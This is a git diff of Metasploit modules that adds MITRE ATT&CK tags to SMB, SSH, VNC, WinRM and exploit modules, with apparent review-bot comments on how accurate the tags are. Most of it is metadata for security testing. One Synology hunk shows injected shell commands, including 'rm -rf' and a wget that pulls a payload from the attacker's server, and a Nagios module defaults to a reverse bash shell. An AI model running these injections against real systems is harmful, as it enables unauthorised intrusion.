diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb index 9a73089b15..8c9f556b8d 100644 --- a/modules/auxiliary/admin/smb/check_dir_file.rb +++ b/modules/auxiliary/admin/smb/check_dir_file.rb @@ -31,6 +31,7 @@ class MetasploitModule < Msf::Auxiliary 'j0hn__f' ], 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] ], 'License' => MSF_LICENSE, 'Notes' => { diff --git a/modules/auxiliary/admin/smb/download_file.rb b/modules/auxiliary/admin/smb/download_file.rb index d7e7743d22..cdcfd87e81 100644 --- a/modules/auxiliary/admin/smb/download_file.rb +++ b/modules/auxiliary/admin/smb/download_file.rb @@ -29,7 +29,10 @@ class MetasploitModule < Msf::Auxiliary 'Stability' => [CRASH_SAFE], 'SideEffects' => [], 'Reliability' => [] - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] + ] ) register_options([ diff --git a/modules/auxiliary/admin/smb/list_directory.rb b/modules/auxiliary/admin/smb/list_directory.rb index 374f0865c3..c883f9355a 100644 --- a/modules/auxiliary/admin/smb/list_directory.rb +++ b/modules/auxiliary/admin/smb/list_directory.rb @@ -27,6 +27,7 @@ class MetasploitModule < Msf::Auxiliary 'hdm' ], 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] ], 'License' => MSF_LICENSE, 'Notes' => { diff --git a/modules/auxiliary/admin/smb/ms17_010_command.rb b/modules/auxiliary/admin/smb/ms17_010_command.rb index 38d598e61a..a0b2a38a6b 100644 --- a/modules/auxiliary/admin/smb/ms17_010_command.rb +++ b/modules/auxiliary/admin/smb/ms17_010_command.rb 
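Review bot: In download_file.rb the new `'References'` key is appended after `'Notes'` at the tail of the info hash, whereas check_dir_file.rb, list_directory.rb and upload_file.rb in this same commit keep `'References'` ahead of `'License'` and `'Notes'`. Key order does not change behaviour, but one consistent order across the SMB admin modules makes the metadata easier to audit, so I would move the block up so that `'References' => [ ... ],` precedes `'Notes' => {`. The same tail placement appears in ssh_login_pubkey.rb, winrm_cmd.rb and winrm_wql.rb, where the key is added after `'License'`. The enclosing info hash starts outside the hunk.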
@@ -41,6 +41,7 @@ class MetasploitModule < Msf::Auxiliary [ 'URL', 'https://github.com/worawit/MS17-010' ], [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ], [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ], ], 'DisclosureDate' => '2017-03-14', 'Notes' => { diff --git a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb index 27ca1898fc..0d23da474b 100644 --- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb +++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb @@ -29,7 +29,8 @@ class MetasploitModule < Msf::Auxiliary 'References' => [ ['CVE', '2010-0926'], ['OSVDB', '62145'], - ['URL', 'http://www.samba.org/samba/news/symlink_attack.html'] + ['URL', 'http://www.samba.org/samba/news/symlink_attack.html'], + ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES] ], 'License' => MSF_LICENSE, 'Notes' => { diff --git a/modules/auxiliary/admin/smb/upload_file.rb b/modules/auxiliary/admin/smb/upload_file.rb index 856c6d9345..908c91949d 100644 --- a/modules/auxiliary/admin/smb/upload_file.rb +++ b/modules/auxiliary/admin/smb/upload_file.rb @@ -26,6 +26,7 @@ class MetasploitModule < Msf::Auxiliary 'hdm' # metasploit module ], 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] ], 'License' => MSF_LICENSE, 'Notes' => { diff --git a/modules/auxiliary/admin/smb/webexec_command.rb b/modules/auxiliary/admin/smb/webexec_command.rb index ce6f46611b..5e28c25e82 100644 --- a/modules/auxiliary/admin/smb/webexec_command.rb +++ b/modules/auxiliary/admin/smb/webexec_command.rb 
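Review bot: The `T1021_002_SMB_WINDOWS_ADMIN_SHARES` entry added to ms17_010_command.rb describes authenticated use of admin shares, but every other reference in this list is an MS17-010 exploit write-up, so the access path looks like exploitation of a remote service (ATT&CK T1210) rather than a valid-account logon. Anyone deriving detection coverage from these tags would file an exploitation module under lateral movement with legitimate credentials. I would list the exploitation technique next to this entry, or in place of it, using whichever constant `Mitre::Attack::Technique` defines for T1210 (the constant table is not visible in this diff). The same question applies to samba_symlink_traversal.rb (CVE-2010-0926 in Samba, not Windows admin shares), to webexec_command.rb, and to the linux/http and multi/http exploit hunks further down that receive the parent `T1021_REMOTE_SERVICES`, where T1190 or T1210 looks closer.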
@@ -30,7 +30,8 @@ class MetasploitModule < Msf::Auxiliary 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://webexec.org'], - ['CVE', '2018-15442'] + ['CVE', '2018-15442'], + ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES] ], 'Notes' => { 'Stability' => [CRASH_SAFE], diff --git a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb index a8a290d996..214a32700b 100644 --- a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb +++ b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb @@ -29,6 +29,7 @@ class MetasploitModule < Msf::Auxiliary ['OSVDB', '25479'], ['URL', 'https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/'], ['CVE', '2006-2369'], + ['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC], ], 'DisclosureDate' => '2006-05-15', 'Notes' => { diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 3dd4715141..dee6e214ef 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -43,6 +43,7 @@ class MetasploitModule < Msf::Auxiliary ], 'References' => [ [ 'CVE', '1999-0506'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ], ], 'License' => MSF_LICENSE, 'DefaultOptions' => { diff --git a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb index 6c59f460a1..778263eafd 100644 --- a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb 
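Review bot: The entry added to smb_login.rb tags a credential-guessing scanner only with `T1021_002_SMB_WINDOWS_ADMIN_SHARES`, although the neighbouring reference is `[ 'CVE', '1999-0506'], # Weak password`; ATT&CK tracks the guessing itself as T1110 (Brute Force), and T1021.x only covers what happens once a credential works. For defenders mapping module runs to detections, the brute-force tag is the one that lines up with failed-logon telemetry, so I would add it alongside the new line rather than rely on T1021 alone. The same applies to ssh_login.rb, telnet_login.rb, vnc_login.rb and winrm_login.rb, which all carry the "Weak password" CVE comment. The exact constant name for T1110 is not visible in this diff and should be taken from the `Mitre::Attack::Technique` table.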
@@ -33,7 +33,8 @@ class MetasploitModule < Msf::Auxiliary ['CVE', '2018-16158'], ['EDB', '45283'], ['URL', 'https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'], - ['URL', 'https://www.ctrlu.net/vuln/0006.html'] + ['URL', 'https://www.ctrlu.net/vuln/0006.html'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2018-07-18', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index 8ef9ec6e03..bc8232e9c2 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -29,7 +29,8 @@ class MetasploitModule < Msf::Auxiliary ['EDB', '39224'], ['PACKETSTORM', '135225'], ['URL', 'https://seclists.org/fulldisclosure/2016/Jan/26'], - ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'] + ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2016-01-09', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb index f2d06e9e05..90c1e3c605 100644 --- a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb @@ -26,7 +26,8 @@ class MetasploitModule < Msf::Auxiliary 'References' => [ ['CVE', '2015-7755'], ['URL', 'https://www.rapid7.com/blog/post/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/'], - ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713'] + ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2015-12-20', 'License' => MSF_LICENSE, 
diff --git a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb index c90f6c0f24..5e39df5079 100644 --- a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb +++ b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb @@ -36,7 +36,8 @@ class MetasploitModule < Msf::Auxiliary ], 'References' => [ ['CVE', '2018-10933'], - ['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt'] + ['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2018-10-16', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb b/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb index a66ca27b0d..2acecea4b8 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb @@ -22,7 +22,10 @@ class MetasploitModule < Msf::Auxiliary 'Author' => ['Wyatt Dahlenburg (@wdahlenb)'], 'Platform' => ['linux'], 'SessionTypes' => ['shell', 'meterpreter'], - 'References' => [['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection']], + 'References' => [ + ['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] + ], 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index a1c411d256..1eac991d82 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb 
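Review bot: `T1021_004_SSH` on ssh_enum_git_keys.rb looks like a mismatch: the module declares `'SessionTypes' => ['shell', 'meterpreter']` and its only other reference is GitHub's page on testing an SSH connection, which suggests it works with SSH keys found on a host where a session already exists rather than logging in to a remote service. If that reading is right, the credential-access technique for private keys (T1552.004) is the closer tag and should at least be listed alongside the new entry. This needs confirming against the module body, which is outside the hunk.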
@@ -28,7 +28,8 @@ class MetasploitModule < Msf::Auxiliary }, 'Author' => ['todb'], 'References' => [ - [ 'CVE', '1999-0502'] # Weak password + [ 'CVE', '1999-0502'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'VERBOSE' => false } # Disable annoying connect errors diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index 6953aa11f4..907b186446 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -35,7 +35,10 @@ class MetasploitModule < Msf::Auxiliary be shared between subject keys or only belong to a single one. }, 'Author' => ['todb', 'RageLtMan'], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] + ] ) register_options( diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb index a0a4c9bdf1..f758c71f18 100644 --- a/modules/auxiliary/scanner/telnet/telnet_login.rb +++ b/modules/auxiliary/scanner/telnet/telnet_login.rb @@ -26,7 +26,8 @@ class MetasploitModule < Msf::Auxiliary }, 'Author' => 'egypt', 'References' => [ - [ 'CVE', '1999-0502'] # Weak password + [ 'CVE', '1999-0502'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb index 38ac706278..eecb689ea5 100644 --- a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb +++ b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb 
@@ -21,7 +21,8 @@ class MetasploitModule < Msf::Auxiliary 'References' => [ [ 'CVE', '2012-1803' ], [ 'EDB', '18779' ], - [ 'US-CERT-VU', '889195' ] + [ 'US-CERT-VU', '889195' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Author' => [ 'Borja Merino ', diff --git a/modules/auxiliary/scanner/vnc/ard_root_pw.rb b/modules/auxiliary/scanner/vnc/ard_root_pw.rb index 78d3adf7ba..d0ef3b604b 100644 --- a/modules/auxiliary/scanner/vnc/ard_root_pw.rb +++ b/modules/auxiliary/scanner/vnc/ard_root_pw.rb @@ -14,7 +14,8 @@ class MetasploitModule < Msf::Auxiliary 'Description' => 'Enable and set root account to a chosen password on unpatched macOS High Sierra hosts with either Screen Sharing or Remote Management enabled.', 'References' => [ ['CVE', '2017-13872'], - ['URL', 'https://support.apple.com/en-us/HT208315'] + ['URL', 'https://support.apple.com/en-us/HT208315'], + ['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC] ], 'Author' => 'jgor', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb index f69fa4fac0..8fdc830500 100644 --- a/modules/auxiliary/scanner/vnc/vnc_login.rb +++ b/modules/auxiliary/scanner/vnc/vnc_login.rb @@ -26,7 +26,8 @@ class MetasploitModule < Msf::Auxiliary 'jduck' ], 'References' => [ - [ 'CVE', '1999-0506'] # Weak password + [ 'CVE', '1999-0506'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index f5997805fe..6f2bb30591 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb 
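Review bot: vnc_login.rb is tagged with the parent `T1021_REMOTE_SERVICES` even though this commit uses `T1021_005_VNC` for realvnc_41_bypass.rb and ard_root_pw.rb, so the VNC login scanner ends up less specific than its sibling modules. The parent technique is understandable for the telnet modules, since ATT&CK defines no telnet sub-technique, but for VNC a sub-technique exists and is already referenced in this diff. I would change the added line to `[ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ]` so that filtering modules by sub-technique returns all three VNC modules.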
@@ -17,7 +17,10 @@ class MetasploitModule < Msf::Auxiliary This module runs arbitrary Windows commands using the WinRM Service }, 'Author' => [ 'thelightcosine' ], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ] + ] ) register_options( diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index a39146c1f7..a6c85810e2 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -30,7 +30,8 @@ class MetasploitModule < Msf::Auxiliary }, 'Author' => [ 'thelightcosine', 'smashery' ], 'References' => [ - [ 'CVE', '1999-0502'] # Weak password + [ 'CVE', '1999-0502'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ] ], 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 2db73ca878..c020d1f3fd 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -19,7 +19,10 @@ class MetasploitModule < Msf::Auxiliary winrm option must be set. }, 'Author' => [ 'thelightcosine' ], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ] + ] ) register_options( diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index 3b80bacf63..fc17ef5b25 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb @@ -26,7 +26,8 @@ class MetasploitModule < Msf::Exploit::Remote 'hdm' ], 'References' => [ - ['OSVDB', '61284'] + ['OSVDB', '61284'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' 
diff --git a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb index db93ccdad7..9ce0722456 100644 --- a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb +++ b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb @@ -42,7 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['CVE', '2023-45249'], ['URL', 'https://security-advisory.acronis.com/advisories/SEC-6452'], - ['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249'] + ['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], diff --git a/modules/exploits/linux/http/asuswrt_lan_rce.rb b/modules/exploits/linux/http/asuswrt_lan_rce.rb index 34f56c81f4..1342cb373b 100644 --- a/modules/exploits/linux/http/asuswrt_lan_rce.rb +++ b/modules/exploits/linux/http/asuswrt_lan_rce.rb @@ -33,7 +33,8 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'], ['URL', 'https://seclists.org/fulldisclosure/2018/Jan/78'], ['CVE', '2018-5999'], - ['CVE', '2018-6000'] + ['CVE', '2018-6000'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Targets' => [ [ diff --git a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb index 85d67626f5..82c300184d 100644 --- a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb +++ b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb 
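Review bot: The `T1021_004_SSH` entry in acronis_cyber_infra_cve_2023_45249.rb has no visible justification: the module lives under linux/http and the references in the hunk are the CVE and two advisories, none of which mention SSH. Other lists in this commit annotate entries with trailing comments (`# Weak password`, `# Rapid7 Analysis`), and a short comment naming the stage that uses SSH would let a reader verify the mapping, for example `['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] # <stage of the module that uses SSH>`. igel_command_injection.rb has the same gap, with `T1021_005_VNC` on a linux/misc module whose visible references do not mention VNC.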
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote ['CVE', '2025-1094'], # The SQL injection in PostgreSQL code. ['URL', 'http://web.archive.org/web/20241226144006/https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # BeyondTrust Advisory ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # PostgreSQL Advisory - ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'] # Rapid7 Analysis + ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'], # Rapid7 Analysis + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2024-12-16', 'Platform' => [ 'linux', 'unix' ], diff --git a/modules/exploits/linux/http/f5_icontrol_exec.rb b/modules/exploits/linux/http/f5_icontrol_exec.rb index f132df4b1a..6dca771cce 100644 --- a/modules/exploits/linux/http/f5_icontrol_exec.rb +++ b/modules/exploits/linux/http/f5_icontrol_exec.rb @@ -24,7 +24,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ ['CVE', '2014-2928'], - ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html'] + ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, diff --git a/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb b/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb index cbb771403d..a0921d06cf 100644 --- a/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb +++ b/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb 
@@ -53,7 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'References' => [ ['CVE', '2019-15949'], - ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] # original PHP exploit + ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'], # original PHP exploit + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Payload' => { 'BadChars' => "\x00" }, 'Targets' => [ @@ -77,7 +78,9 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }, 'Payload' => { + # rubocop:disable Lint/DetectMetadataTrailingLeadingWhitespace 'Append' => ' & disown', # the payload must be disowned after execution, otherwise cleanup fails + # rubocop:enable Lint/DetectMetadataTrailingLeadingWhitespace 'BadChars' => '"' } } diff --git a/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb index 27c429b14e..398540005b 100644 --- a/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb +++ b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb @@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://github.com/Supervisor/supervisor/issues/964'], ['URL', 'https://www.debian.org/security/2017/dsa-3942'], ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'], - ['CVE', '2017-11610'] + ['CVE', '2017-11610'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Platform' => 'linux', 'Targets' => [ diff --git a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb index 49c582ac02..49c434e805 100644 --- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb +++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb 
@@ -39,7 +39,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'CVE', '2017-15889' ], [ 'EDB', '43190' ], [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ], - [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ] + [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Privileged' => true, 'Stance' => Msf::Exploit::Stance::Aggressive, @@ -179,20 +180,20 @@ class MetasploitModule < Msf::Exploit::Remote }) print_status('Cleaning env') - inject_request(cookie, token, cmd = 'rm -rf /a') - inject_request(cookie, token, cmd = 'rm -rf b') + inject_request(cookie, token, 'rm -rf /a') + inject_request(cookie, token, 'rm -rf b') command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//) command_space = 22 - "echo -n ''>>/a".length command_space -= 1 command.each_slice(command_space) do |a| a = a.join('') vprint_status("Staging wget with: echo -n '#{a}'>>/a") - inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a") + inject_request(cookie, token, "echo -n '#{a}'>>/a") end print_status('Requesting payload pull') register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b') register_file_for_cleanup('/a') - inject_request(cookie, token, cmd = 'wget -i /a -O b') + inject_request(cookie, token, 'wget -i /a -O b') # at this point we let the HTTP server call the last stage # wfsdelay should be long enough to hold out for everything to download and run rescue ::Rex::ConnectionError diff --git a/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb b/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb index c7e476342f..c6067e58ee 100644 --- a/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb +++ b/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb 
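Review bot: In the second synology_dsm_smart_exec_auth.rb hunk, the cleaned-up call `inject_request(cookie, token, "echo -n '#{a}'>>/a")` still interpolates a block parameter that the preceding line reassigns (`a = a.join('')`), so `a` is first an array slice and then a string. Since the hunk is already tidying these calls by dropping the stray `cmd =` assignments, naming the two values separately is cheap: `command.each_slice(command_space) do |slice|` followed by `chunk = slice.join`, with `chunk` used in both the `vprint_status` and `inject_request` lines. This is a readability point only and does not change behaviour. The enclosing method starts and ends outside the hunk.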
@@ -36,7 +36,8 @@ class MetasploitModule < Msf::Exploit::Remote }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'References' => [ - [ 'CVE', '2013-2578'] + [ 'CVE', '2013-2578'], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Targets' => [ [ 'Automatic', {} ], diff --git a/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb b/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb index 5c813e6be1..61854e380a 100644 --- a/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb +++ b/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb @@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ ['CVE', '2025-24016'], ['URL', 'https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh'], - ['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016'] + ['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], diff --git a/modules/exploits/linux/misc/igel_command_injection.rb b/modules/exploits/linux/misc/igel_command_injection.rb index 2857a90861..666de0b0b2 100644 --- a/modules/exploits/linux/misc/igel_command_injection.rb +++ b/modules/exploits/linux/misc/igel_command_injection.rb @@ -35,7 +35,8 @@ class MetasploitModule < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2025-34082' ], [ 'URL', 'https://kb.igel.com/securitysafety/en/isn-2021-01-igel-os-remote-command-execution-vulnerability-41449239.html' ], - [ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ] + [ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ] ], 'Platform' => ['linux'], 'Arch' => [ARCH_X86, ARCH_X64], 
